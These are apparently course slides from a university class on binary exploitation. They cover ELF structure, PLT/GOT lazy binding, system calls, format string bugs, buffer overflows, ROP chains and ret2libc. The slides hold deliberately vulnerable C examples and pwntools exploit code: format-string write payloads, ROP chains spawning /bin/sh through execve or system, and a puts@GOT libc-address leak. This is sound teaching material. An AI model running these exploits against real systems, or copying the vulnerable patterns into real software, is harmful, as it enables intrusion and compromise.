ENPM809V
Exploitation Review and ROP Chain
What We Work On
- ELF & Linking
- Library And System Calls
- Format String Exploit Review
- ROP Chain and ret2libc
ELF & Linking
ELF Header
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shstrndx;
} Elf32_Ehdr;
$ readelf -h a.out ###Output modified slightly
Magic: 7f 45 4c 46 \x7fELF
Class: ELF32
Data: little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048430
Start of program headers: 52
Start of section headers: 8588
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 35
Section header string table index: 34
e_ -- elf
ph -- program header
sh -- section header
off -- offset
ent -- entry
e_shentsize ?
e_shnum ?
e_phentsize ?
e_shstrndx ?*
Section Header Entry Size
Section Header Number (of entries)
Program Header Entry Size
Section Header String Table Index
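Because the header has a fixed layout, the fields above can be decoded with a few lines of code. The following is a minimal sketch in Python, assuming a 32-bit little-endian ELF. The helper name parse_elf32_header and the synthetic sample header (built from the values in the readelf output above) are illustrative only and are not part of any tool.

```python
import struct

# Elf32_Ehdr: 16-byte e_ident followed by the fields in declaration order.
ELF32_EHDR = struct.Struct("<16sHHIIIIIHHHHHH")
FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry",
    "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
    "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx",
)


def parse_elf32_header(data):
    """Decode the first 52 bytes of a 32-bit little-endian ELF file."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("this sketch only handles ELF32, little endian")
    return dict(zip(FIELDS, ELF32_EHDR.unpack_from(data)))


# Synthetic header using the numbers from the readelf output above.
e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)
sample = ELF32_EHDR.pack(e_ident, 2, 3, 1, 0x8048430, 52, 8588, 0,
                         52, 32, 9, 40, 35, 34)

hdr = parse_elf32_header(sample)
# The section header table ends at e_shoff + e_shnum * e_shentsize.
section_table_end = hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"]
print(hex(hdr["e_entry"]), hdr["e_phnum"], section_table_end)
```

To try it on a real file, pass the first 52 bytes read from a 32-bit binary opened in "rb" mode instead of the synthetic sample.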
### modified output
[Nr] Name Type
[ 0] NULL
[ 1] .interp PROGBITS
[ 2] .note.ABI-tag NOTE
[ 3] .note.gnu.build-i NOTE
[ 4] .gnu.hash GNU_HASH
[ 5] .dynsym DYNSYM
[ 6] .dynstr STRTAB
[ 7] .gnu.version VERSYM
[ 8] .gnu.version_r VERNEED
[ 9] .rela.dyn RELA
[10] .rela.plt RELA
[11] .init PROGBITS
[12] .plt PROGBITS
[13] .plt.got PROGBITS
[14] .text PROGBITS
[15] .fini PROGBITS
[16] .rodata PROGBITS
[17] .eh_frame_hdr PROGBITS
[18] .eh_frame PROGBITS
[19] .init_array INIT_ARRAY
[20] .fini_array FINI_ARRAY
[21] .data.rel.ro PROGBITS
[22] .dynamic DYNAMIC
[23] .got PROGBITS
[24] .data PROGBITS
[25] .bss NOBITS
[26] .gnu_debuglink PROGBITS
[27] .shstrtab STRTAB
Section Header
- A defined header that gives information about a section of the binary
- Usually the section is unstructured
Examples: .text, .got, .data
Run the command readelf -S /bin/bash
Program Header
- Indicates how segments required for execution are to be loaded into virtual memory.
- There exists a Sections to Segment mapping that specifies which sections are part of which segments.
Binary Layout
- Does it matter where the Program and Section headers are in the binary?
- Where must the ELF Header always exist?
- Are all Section or Program headers needed?
How do multiple source files become a single executable?
ELF file formats:
- Executable file
- Shared Object file
- Relocatable file
- and some others
ELF Header specifies the file format
+ Executable: specifies how to load the program into a process image (remember exec and forking?)
+ Relocatable: specifies how to include its own code and data into an Executable or Shared Object. Object files waiting to be included.
+ Shared Object: Dynamic library that the dynamic linker links with an executable at load time. Think libc, which provides printf.
Linker links objects with shared libraries.
What does the whole pipeline look like then?
1. GCC compiles into ELF Relocatables
2. Static linker links Relocatables and attaches necessary information for Shared Object linking into an Executable
3. Loader execs the Executable, then the dynamic linker actually links to the Shared Objects for code execution.
Library and System Calls
What Are They
- Library Calls: calls to functions that are linked into a binary
- System Calls: They are a process's way of asking permission to do something with a resource (at the kernel level)
- System call numbers and calling conventions are not standard between operating systems and architectures
How do Library Calls Work
- At compile time, link against the shared object
- At run time, the dynamic linker sets up the Global Offset Table (GOT) in memory
- Function is called: the call goes to the function's PLT stub, which jumps through the function's GOT entry
- The Procedure Linkage Table (PLT) facilitates what is called lazy binding in programs. Binding is synonymous with the fix-up process the dynamic linker performs for variables located in the GOT. When an entry has been "fixed-up" it is said to be "bound" to its real address.
- Once the entry is bound, the PLT stub jumps straight to the function in the shared object
Reference: https://bottomupcs.sourceforge.net/csbu/x3882.htm
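The lazy binding steps above can be sketched as a toy model. This is only an illustration in Python, not how ld.so is implemented: the class ToyProcess, its call_plt method, and the dictionary standing in for libc are all made up for this example.

```python
class ToyProcess:
    """Toy model of lazy binding through a PLT and GOT."""

    def __init__(self, shared_library):
        self.shared_library = shared_library  # name -> function, stands in for libc
        self.got = {}                         # filled in lazily, one entry per function
        self.resolver_calls = 0

    def _resolve(self, name):
        # Stands in for the dynamic linker's symbol lookup.
        self.resolver_calls += 1
        self.got[name] = self.shared_library[name]

    def call_plt(self, name, *args):
        # PLT stub: jump through the GOT entry, binding it on first use.
        if name not in self.got:
            self._resolve(name)
        return self.got[name](*args)


proc = ToyProcess({"strlen": len})
first = proc.call_plt("strlen", "hello")   # first call: resolve, then call
second = proc.call_plt("strlen", "rop")    # later calls: entry is already bound
print(first, second, proc.resolver_calls)  # prints: 5 3 1
```

Because every call goes through the table, whatever address sits in a GOT entry is where the call ends up, which is why the GOT matters for exploitation.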
How do System Calls Work?
- User code calls a function that makes a system call
- e.g. open, write, read, etc.
- Can call syscall() function directly
- The Libc function makes a request to the kernel
- The kernel looks up the system call requested
- The kernel executes the system call, which then performs the desired action
- The kernel returns the result to the user process
- Read man 2 syscall
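As a small illustration of the flow above, Python's os module exposes thin wrappers around the same system calls (pipe, write, read, close). This is a sketch for experimentation; the pipe is used only so that the example is self-contained.

```python
import os

read_fd, write_fd = os.pipe()               # pipe(2): kernel creates two descriptors
written = os.write(write_fd, b"hello\n")    # write(2): returns the number of bytes written
data = os.read(read_fd, 64)                 # read(2): returns up to 64 bytes
os.close(read_fd)                           # close(2)
os.close(write_fd)
print(written, data)                        # prints: 6 b'hello\n'
```

Running the script under strace shows the corresponding kernel requests.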
I saw you said libc... what is that?
The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages).
-wikipedia
What is happening when we use printf in our binaries?
Ensure that we have the proper #include to reference printf in our code
- The call goes to printf's PLT stub, which jumps to the address stored in printf's GOT entry
- Once resolved, the GOT entry holds the absolute memory address of the code. The PLT delays the cost of looking it up until the first call.
- Lazy binding saves startup time, and sharing one copy of libc between processes saves memory.
How does text make it to the screen?
printf, malloc, read, write, etc. are all wrappers around, or built on top of, system calls.
System calls are the process's way of asking for permission to do something with a resource.
Format String Vulnerabilities
What is it?
- When a software developer passes user-controlled input to a function as the format string itself.
- Perfect example is
printf(user_input);
- What can this lead to?
- Arbitrary Code Execution
- Leakage of information
Example
#include <stdio.h>
#include <unistd.h>
int main() {
int secret_num = 0x8badf00d;
char name[64] = {0};
read(0, name, 64);
printf("Hello ");
printf(name);
printf("! You'll never get my secret!\n");
return 0;
}
How is it vulnerable?
$ ./fmt_string
Enter Input: %7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!
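To see why the output above contains the secret, it helps to split the leaked value. The sketch below assumes a 64-bit little-endian target, where %llx prints one 8-byte stack slot; the 4-byte secret_num occupies only half of it and the other half is whatever neighbouring stack data happened to be there.

```python
import struct

leaked = int("8badf00d3ea43eef", 16)    # text printed by %7$llx above

high = leaked >> 32                     # upper 4 bytes of the slot
low = leaked & 0xFFFFFFFF               # lower 4 bytes of the slot
in_memory = struct.pack("<Q", leaked)   # byte order as stored on the stack

print(hex(high))        # prints: 0x8badf00d
print(hex(low))         # prints: 0x3ea43eef
print(in_memory.hex())  # prints: ef3ea43e0df0ad8b
```

The upper half matches secret_num from the source, so the variable sits 4 bytes into that stack slot.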
Useful Format Strings
- %c - read character from the stack
- %d, %i, %x - read an integer (4 bytes) from the stack (%x is in hex)
- %s - de-reference a pointer and read until null byte is hit
- %hx - leaks two bytes
- %hhx - Leaks one byte
- %lx - leaks 8 bytes
- %n$x - leaks 4 bytes at the nth parameter
- Example: %7$x - prints the 7th parameter on the stack
Executing Data
- For executing data, we need to utilize %n and its variants
- %n dereferences a pointer argument and writes to that address the number of bytes printed so far.
- Why is this bad?
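Since %n stores the count of characters printed so far, an attacker chooses the value written by controlling how much padding is printed first. The sketch below shows the common byte-at-a-time idiom using %hhn. It is a hypothetical helper, not pwntools code: it assumes that nothing has been printed yet by this printf call, and that positional arguments first_arg_index, first_arg_index + 1, and so on already point at target, target + 1, and so on (placing those pointers on the stack is a separate step).

```python
def hhn_write_specifiers(value, first_arg_index, width=4):
    """Build the specifier string that writes `value` one byte at a time."""
    parts = []
    written = 0  # characters printed so far; this is what %n stores
    for i in range(width):
        wanted = (value >> (8 * i)) & 0xFF      # little endian: low byte first
        pad = (wanted - written) % 256          # %hhn keeps only the low byte
        if pad:
            parts.append("%{}c".format(pad))    # print `pad` characters
            written += pad
        parts.append("%{}$hhn".format(first_arg_index + i))
    return "".join(parts)


spec = hhn_write_specifiers(0x1337babe, 10)
print(spec)
# prints: %190c%10$hhn%252c%11$hhn%125c%12$hhn%220c%13$hhn
```

Each %hhn writes only the low byte of the running count, which is why the padding is computed modulo 256 and the total never has to reach the full 32-bit value.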
Executing Shellcode
Executing Shellcode Via Pwntools
from pwn import *

p = process('./vulnerable')
# Function called in order to send a payload
def send_payload(payload):
    log.info("payload = %s" % repr(payload))
    p.sendline(payload)
    return p.recv()
# Create a FmtStr object and give it the function
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
format_string.execute_writes()
Classwork
- What can be found from the format string vulnerability?
- What part of memory can we leak
- See if you can execute shellcode
- Spend 10-20 minutes on it
Buffer Overflow and ROP
Classic Buffer Overflow
int some_function()
{
char buff[128];
gets(buff);
printf("%s\n", buff);
return 0;
}
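The input that overflows a function like the one above has a simple shape: filler for the buffer, filler for the saved frame pointer, then the new return address. The sketch below assumes x86-64, no stack canary, and no compiler padding between the buffer and the saved rbp. The helper build_overflow and the address 0x401196 are hypothetical; the real offset has to be measured in a debugger.

```python
import struct


def build_overflow(buf_size, new_ret, saved_frame_ptr_size=8):
    """Lay out bytes that overwrite the saved return address."""
    filler = b"A" * buf_size                  # fills char buff[128]
    fake_rbp = b"B" * saved_frame_ptr_size    # overwrites the saved rbp
    return filler + fake_rbp + struct.pack("<Q", new_ret)


payload = build_overflow(128, 0x401196)       # 0x401196 is a made-up target
print(len(payload), payload[-8:].hex())
```

Note that gets stops at a newline, so an address containing the byte 0x0a cannot be delivered this way.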
Bypassing Mitigations
- RET2LIBC
- Address Leakage
ROP Chain
- ROP stands for return-oriented programming
- A way of bypassing non-executable stack protection.
- Reuses code in shared objects or the program itself
- Classic example is RET2LIBC
ROP Chain - How it Works
- Overflow the buffer to jump to various gadgets
- A gadget could be something like
pop rdi; ret
- Return to an address that you control (the next gadget)
- Chain as many of these gadgets together to create desired effect
- Example: create a ROP chain that executes /bin/sh via syscall
What this looks like
#include <stdio.h>
#include <string.h>
void rop1()
{
printf("1\n");
}
void rop2()
{
printf("2\n");
}
void rop3()
{
printf("3\n");
}
void vuln(char *str)
{
char buffer[100];
strcpy(buffer, str);
}
void main(int argc, char** argv)
{
vuln(argv[1]);
}
payload = b"\x90"*108 + rop1_addr + rop2_addr + rop3_addr
output:
1
2
3
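The reason the three functions run in order is that each ret pops the next address from the attacker-controlled stack. The toy model below illustrates that mechanism in Python. The addresses, the gadget table, and the run_chain helper are all invented for this sketch, and it also includes a pop rdi gadget to show how a gadget consumes the stack word that follows it.

```python
def run_chain(stack, gadgets):
    """Toy ROP machine: every ret pops the next address and jumps to it."""
    regs = {"rdi": None}
    output = []
    stack = list(stack)
    while stack:
        addr = stack.pop(0)                   # ret: pop the next return address
        for op in gadgets[addr]:              # execute the gadget body
            if op == "pop rdi":
                regs["rdi"] = stack.pop(0)    # consumes the following stack word
            elif op.startswith("print "):
                output.append(op[len("print "):])
    return output, regs


GADGETS = {
    0x1000: ["print 1"],   # stands in for rop1
    0x2000: ["print 2"],   # stands in for rop2
    0x3000: ["print 3"],   # stands in for rop3
    0x4000: ["pop rdi"],   # stands in for a pop rdi; ret gadget
}

chain = [0x1000, 0x2000, 0x4000, 0xdeadbeef, 0x3000]
output, regs = run_chain(chain, GADGETS)
print(output, hex(regs["rdi"]))   # prints: ['1', '2', '3'] 0xdeadbeef
```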
Important Gadgets
- Find resources on the stack - (such as finding /bin/sh or /bin/cat)
- Fixup Gadgets - Meant to repair (fix up) the stack
- Examples are pop r12; pop rdi; pop rsi; ret
- add rsp, 0x40; ret
- Storing values into registers
- pop rdx; ret
ROP Chain
[*] rop2 Chain dump:
0x0000: 0x7f34ab6b15 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f349c1ccd pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f34b51d4e [arg0] rdi = 546345131342
0x0038: 0x7f34a80a94 execve
How Did we Get that ROP Chain?
- Need to understand what parameters need to be set
- How to set them
- Find the gadgets
- Construct the ROP chain
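On x86-64 Linux the first three function arguments go in rdi, rsi and rdx, which is why the chain dump above loads exactly those registers before reaching execve. As a rough sketch, the same chain can be laid out by hand as 8-byte little-endian words. The helper name flat is our own (pwntools has a similar utility), and the addresses are copied from the dump, so they are only valid for that particular run.

```python
import struct


def flat(words):
    """Concatenate raw bytes and 8-byte little-endian integers."""
    out = b""
    for word in words:
        out += word if isinstance(word, bytes) else struct.pack("<Q", word)
    return out


chain = flat([
    0x7f34ab6b15,   # pop rdx; pop r12; ret
    0x0,            # rdx = 0 (arg2)
    b"eaaafaaa",    # padding consumed by pop r12
    0x7f349c1ccd,   # pop rsi; ret
    0x0,            # rsi = 0 (arg1)
    0x4013a3,       # pop rdi; ret
    0x7f34b51d4e,   # rdi = address of the string (arg0)
    0x7f34a80a94,   # execve
])
print(len(chain))   # prints: 64
```

The word at offset 0x30 is the value the dump shows in decimal as 546345131342.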
Finding Gadgets
ROPGadget
https://github.com/JonathanSalwan/ROPgadget
Ropper
https://github.com/sashs/Ropper
Open homework or classwork. Find some gadgets for 10 minutes
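At their core, gadget finders search executable bytes for instruction encodings that end in ret. The sketch below is a deliberately naive version of that idea, not how ROPgadget or Ropper are implemented. It relies on the x86-64 encodings 5f (pop rdi) and c3 (ret); the sample bytes and the base address 0x401000 are made up.

```python
POP_RDI_RET = b"\x5f\xc3"   # pop rdi; ret


def find_gadget(code, pattern, base=0):
    """Return the address of every occurrence of `pattern` in `code`."""
    hits = []
    start = code.find(pattern)
    while start != -1:
        hits.append(base + start)
        start = code.find(pattern, start + 1)
    return hits


# nop; pop r15; ret; pop rdi; ret
code = b"\x90\x41\x5f\xc3\x5f\xc3"
hits = find_gadget(code, POP_RDI_RET, base=0x401000)
print([hex(h) for h in hits])   # prints: ['0x401002', '0x401004']
```

The first hit lands in the middle of pop r15; ret (41 5f c3): jumping one byte into that instruction yields pop rdi; ret, which is why gadgets can exist even where the compiler never emitted them.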
Pwntools
#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
Common Gadgets
- ret - at the end of every function
- leave; ret - at the end of many functions
- pop REG; ret - restoring callee-saved registers
- mov rax, REG; ret - setting the return value (always in RAX)
Although these are common, you don't have to use just these. You can search for any combination of instructions.
Other Important Concepts
Procedure Linkage Table
- What is actually called when you call a function from a dynamically linked library
- If GOT entry for the function is resolved, jumps immediately there
- If GOT entry is not resolved, then it first resolves the GOT entry, then jumps to it
Global Offset Table
- A table of addresses holding the locations in memory of shared library functions (such as those in libc)
- Each entry holds the address of the actual function
- To summarize, the PLT redirects code execution to the address stored in the GOT.
- If the entry has not been resolved yet, it coordinates with ld.so (dynamic linker/loader) to get the function address and store it in the GOT.
Why is this important?
Needed for ret2libc! (homework)
Ret2libc
- Redirecting the binary to return into code in the system's libc
- Helps us to bypass NX or DEP
Ret2libc - system("/bin/sh")
- Get base address of libc
- If ASLR is enabled, we need to leak this
- Add padding up to the saved return address
- Find the address of
pop rdi; ret
- Find the address of the "/bin/sh" string
- Find the address of "system"
- Say where you want to return to
How can we find these gadgets?
You do that right now! Use ropper/ROPGadget to find them.
What does this look like?
# pwntools example
rop = ROP([binary, libc])
binsh = next(libc.search(b"/bin/sh"))
rop.execve(binsh, 0, 0)
rop.dump()
'''output
[*] rop Chain dump:
0x0000: 0x7f69246a85 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f69153673 pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f692e1c11 [arg0] rdi = 547225476113
0x0038: 0x7f692107c4 execve
'''
payload = padding + rop.chain()
### without pwntools gadget finder
# You need to work out these addresses
# from the binary and libc
libc_base = 0x12345678
POP_RDI = pop_rdi_addr
system = libc_base + offset_system_addr
binsh = libc_base + offset_binsh_addr
payload = padding
payload += p64(POP_RDI)
payload += p64(binsh)
payload += p64(system)
payload += p64(whatever_you_want_to_ret_to)
What if we need libc base address?
int vuln()
{
char buffer[128];
gets(buffer);
printf("%s\n", buffer);
}
- Utilize the PLT and GOT to resolve a function
- Subtract that function's offset within libc from the leaked address to get the libc base.
We need a place to receive input
payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beginning_of_vuln
# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()
'''
[*] Rop1 chain dump:
0x0000: 0x4013a3 pop rdi; ret
0x0008: 0x404028 [arg0] rdi = got.puts
0x0010: 0x4010c4 puts
0x0018: 0x401316 0x401316()
'''
libc = ELF("/path/to/libc.so.6")
io.sendline(payload)
addr = io.recvline()
#parse the address received
addr = addr.strip()
leak = u64(addr.ljust(8, b"\x00"))
libc.address = leak-libc.symbols["puts"]
log.info("libc base address = 0x{:x}".format(libc.address))
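The arithmetic behind the leak can be checked without pwntools. In the sketch below the leaked address and PUTS_OFFSET are hypothetical numbers chosen for illustration; the real offset comes from the target's libc. puts stops at the first null byte, so a userland address usually arrives as 6 bytes followed by a newline, which is why the value is padded to 8 bytes before unpacking.

```python
import struct


def libc_base_from_leak(line, symbol_offset):
    """Turn the raw bytes printed by puts(got entry) into a libc base."""
    raw = line.rstrip(b"\n")                                # drop the newline puts adds
    leak = struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]    # pad to 8 bytes
    return leak - symbol_offset


PUTS_OFFSET = 0x80e50                                       # hypothetical offset of puts
line = struct.pack("<Q", 0x7f1234a80e50)[:6] + b"\n"        # simulated program output

base = libc_base_from_leak(line, PUTS_OFFSET)
print(hex(base))   # prints: 0x7f1234a00000
```

A quick sanity check is that the computed base is page aligned (its low 12 bits are zero); if it is not, the offset or the libc version is probably wrong.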
Putting it all together
- Get the libc base address
- Leak it somehow
- Format string or printing it out via another ROP Chain
- Find the gadgets to execute the functions you want (from libc and the binary)
- Construct the ROP chain to execute what you'd like
- Execute!
Work on the homework!
ENPM809V - Exploitation Review and ROP Chain
By Ragnar Security